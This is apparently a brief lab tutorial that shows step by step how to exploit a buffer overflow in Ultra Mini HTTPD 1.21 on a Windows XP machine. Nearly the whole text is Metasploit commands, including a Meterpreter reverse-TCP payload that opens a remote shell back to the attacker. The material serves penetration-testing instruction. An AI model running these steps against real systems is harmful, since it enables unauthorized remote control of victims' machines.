Kali Linux, Penetration Testing

Exploit Windows PC using Ultra Mini HTTPD Stack Buffer Overflow

This module exploits a stack based buffer overflow in Ultra Mini HTTPD 1.21 allowing remote attackers to execute arbitrary code via a long resource name in an HTTP request

Exploit Targets

Ultra Mini HTTPD 1.21


Attacker: Kali Linux

Victim PC: Windows XP SP 3

Open Kali Linux terminal type msfconsole

Now type use exploit/windows/http/ultraminihttp_bof

msf exploit (ultraminihttp_bof)>set payload windows/meterpreter/reverse_tcp

msf exploit (ultraminihttp_bof)>set lhost (IP of Local Host)

msf exploit (ultraminihttp_bof)>set rhost (IP of Victim PC)

msf exploit (ultraminihttp_bof)>exploit